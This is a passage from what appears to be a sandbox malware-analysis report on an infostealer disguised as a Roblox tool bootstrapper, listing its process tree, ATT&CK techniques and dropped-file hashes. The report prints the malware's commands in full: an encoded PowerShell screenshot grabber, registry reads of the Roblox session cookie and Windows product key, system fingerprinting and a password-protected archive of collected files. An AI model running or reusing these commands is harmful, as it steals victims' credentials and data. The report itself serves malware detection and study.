JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:3460
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3416
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zx3dxdgn\zx3dxdgn.cmdline"
        5⤵
        
        PID:4604
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEB98.tmp" "c:\Users\Admin\AppData\Local\Temp\zx3dxdgn\CSCA82D5707BF594736B8F67C442884247C.TMP"
        6⤵
        
        PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:312
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2144
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:2748
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4220
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2192
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4524
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4676
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2176
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2588
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2840
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3348
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:96
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2804
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4612
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3468
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI41122\rar.exe a -r -hp"ilovegrave" "C:\Users\Admin\AppData\Local\Temp\1hPe5.zip" *"
    3⤵
    PID:4408
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2208
  - - C:\Users\Admin\AppData\Local\Temp\_MEI41122\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI41122\rar.exe a -r -hp"ilovegrave" "C:\Users\Admin\AppData\Local\Temp\1hPe5.zip" *
      4⤵
      Executes dropped EXE
      PID:4168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:2568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1280
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:3668
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:3456
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3788
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1752
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\SolaraBoostrapper.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:4452
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1068
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4956

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
cd5b15b46b9fe0d89c2b8d351c303d2a

SHA1
e1d30a8f98585e20c709732c013e926c7078a3c2

SHA256
0a8a0dcbec27e07c8dc9ef31622ac41591871416ccd9146f40d8cc9a2421da7a

SHA512
d7261b2ff89adcdb909b775c6a47b3cd366b7c3f5cbb4f60428e849582c93e14e76d7dcadec79003eef7c9a3059e305d5e4f6b5b912b9ebc3518e06b0d284dd7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e18f39001e99023b1a7e83926125e4aa

SHA1
90a964f96833c58378d8f3ed513a4652f4781ec8

SHA256
ac54cfe0cfc040fdf0d4d46a4d0d0476075ea9447cda7b284b787a41faf8e864

SHA512
5e05c9f1fcc9a722db31cde80e1820087e9b35a496dda92e39b8de77ab2bb289dc64b573baf4b93d702c8a0a5dbad5ca0ba2e7341269be5ad5f261d0a98c3eef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
abc29636e271b0b5be599184d543e717

SHA1
6e21cae657d1a4841189c2ecc50adb4464e5cb52

SHA256
94a0117495a87b01271e928b48556f606c915bf292e0c4a46bec8bdbff8eaf23

SHA512
4758c76d81dc2636e5add07e31a6f4c06373276057b7c33c4b96d87ddd12233c489026f51aa3a51dc72c556bd24789cf5b57637e820d64375671d9cb9d2c8ab9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
833098c742b58ca01cecc19d2f713867

SHA1
0e0d22e2dc633ce3904568953e74df50cb9e2d1e

SHA256
a3a637ce14afb106dc154ccdc1bfcebc4ec50a1d5033f74df79471292aeaf47b

SHA512
f9d14d4a2618fccd5fb233a8825348f0fb6bb538454bf41c957cdf8ae29333d075009816a480db056628211aefc0af5e353460a5002acb71573ba94094b46c77

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
326a6cddfaa7b42f08369fad26a7b1cf

SHA1
6a790275a4b0ddf6e88e935071e68d96c32da078

SHA256
014635101e772f2b1f062788a97684c5deaeb27133a1368d7543e50ada3c7f80

SHA512
7f67c8e21bc5b95e340416a61a916957eb529884b6b9517701d2e70ba56c5590f6f1bf699d5942f5fd271ee45af21d28b0704bb00877e5d9ae9301c2b5763686

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEB98.tmp

Filesize
1KB

MD5
cebcef6b10e48bb4b224dc728f708feb

SHA1
2dabfebbc6f110a55ecabe8aadd100f55c5e3669

SHA256
1e0fe4657e16ca689e6bc35467b55d4693e56d8f070429e9f9a34203e44e626c

SHA512
c1b936ff15576e9f93d86a77fbe86fe280a59efe2b5c13080ec30f568bc90fc870d76bb3078a3a442f5547da20bd2488b9c6bf5fa08ee8182ef23bfa620bc185

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41122\VCRUNTIME140.dll

Filesize
106KB

MD5
870fea4e961e2fbd00110d3783e529be

SHA1
a948e65c6f73d7da4ffde4e8533c098a00cc7311

SHA256
76fdb83fde238226b5bebaf3392ee562e2cb7ca8d3ef75983bf5f9d6c7119644

SHA512
0b636a3cdefa343eb4cb228b391bb657b5b4c20df62889cd1be44c7bee94ffad6ec82dc4db79949edef576bff57867e0d084e0a597bf7bf5c8e4ed1268477e88

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_bz2.pyd

Filesize
46KB

MD5
93fe6d3a67b46370565db12a9969d776

SHA1
ff520df8c24ed8aa6567dd0141ef65c4ea00903b

SHA256
92ec61ca9ac5742e0848a6bbb9b6b4cda8e039e12ab0f17fb9342d082dde471b

SHA512
5c91b56198a8295086c61b4f4e9f16900a7ec43ca4b84e793bc8a3fc8676048cab576e936515bf2971318c7847f1314674b3336fe83b1734f9f70d09615519ac

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_decimal.pyd

Filesize
103KB

MD5
f65d2fed5417feb5fa8c48f106e6caf7

SHA1
9260b1535bb811183c9789c23ddd684a9425ffaa

SHA256
574fe8e01054a5ba07950e41f37e9cf0aea753f20fe1a31f58e19202d1f641d8

SHA512
030502fa4895e0d82c8cce00e78831fc3b2e6d956c8cc3b9fb5e50cb23ef07cd6942949a9f16d02da6908523d9d4ef5f722fb1336d4a80cd944c9f0cb11239ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_hashlib.pyd

Filesize
33KB

MD5
4ae75c47dbdebaa16a596f31b27abd9e

SHA1
a11f963139c715921dedd24bc957ab6d14788c34

SHA256
2308ee238cc849b1110018b211b149d607bf447f4e4c1e61449049eab0cf513d

SHA512
e908fecb52268fac71933e2fdb96e539bdebe4675dfb50065aee26727bac53e07cca862193bcb3ab72d2ae62d660113a47e73e1e16db401480e4d3fd34d54fa8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_lzma.pyd

Filesize
84KB

MD5
6f810f46f308f7c6ccddca45d8f50039

SHA1
6ee24ff6d1c95ba67e1275bb82b9d539a7f56cea

SHA256
39497259b87038e86c53e7a39a0b5bbbfcebe00b2f045a148041300b31f33b76

SHA512
c692367a26415016e05ebe828309d3ffec290c6d2fd8cc7419d529a51b0beda00ccdc327c9f187ae3ca0cc96336d23d84a8ff95b729c8958b14fb91b6da9e878

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_queue.pyd

Filesize
24KB

MD5
0e7612fc1a1fad5a829d4e25cfa87c4f

SHA1
3db2d6274ce3dbe3dbb00d799963df8c3046a1d6

SHA256
9f6965eb89bbf60df0c51ef0750bbd0655675110d6c42eca0274d109bd9f18a8

SHA512
52c57996385b9a573e3105efa09fd6fd24561589b032ef2b2ee60a717f4b33713c35989f2265669f980646d673e3c387b30b9fc98033bb8ca7c59ece1c17e517

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_socket.pyd

Filesize
41KB

MD5
7a31bc84c0385590e5a01c4cbe3865c3

SHA1
77c4121abe6e134660575d9015308e4b76c69d7c

SHA256
5614017765322b81cc57d841b3a63cbdc88678ff605e5d4c8fdbbf8f0ac00f36

SHA512
b80cd51e395a3ce6f345b69243d8fc6c46e2e3828bd0a7e63673a508d889a9905d562cac29f1ed394ccfcda72f2f2e22f675963dd96261c19683b06dea0a0882

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_sqlite3.pyd

Filesize
48KB

MD5
bb4aa2d11444900c549e201eb1a4cdd6

SHA1
ca3bb6fc64d66deaddd804038ea98002d254c50e

SHA256
f44d80ab16c27ca65da23ae5fda17eb842065f3e956f10126322b2ea3ecdf43f

SHA512
cd3c5704e5d99980109fdc505d39ad5b26a951685e9d8e3fed9e0848cd44e24cc4611669dbdb58acc20f1f4a5c37d5e01d9d965cf6fe74f94da1b29aa2ff6931

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41122\_ssl.pyd

Filesize
60KB

MD5
081c878324505d643a70efcc5a80a371

SHA1
8bef8336476d8b7c5c9ef71d7b7db4100de32348

SHA256
fcb70b58f94f5b0f9d027999cce25e99ddcc8124e4ddcc521cb5b96a52faaa66

SHA512
c36293b968a2f83705815ef3a207e444eeb7667ad9af61df75e85151f74f2fe0a299b3b1349de0d410bbbaea9f99cac5228189099a221de5fa1e20c97c648e32

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI41122\base_library.zip

Filesize
859KB

MD5
ee93ce2f8261ba7510f041619bb2b6f2

SHA1
f1d5d2f4c0b10e862b4b0a5ea65c47645901f894

SHA256
41ce839465cf935b821cafc3a98afe1c411bf4655ad596442eb66d140ccd502e

SHA512
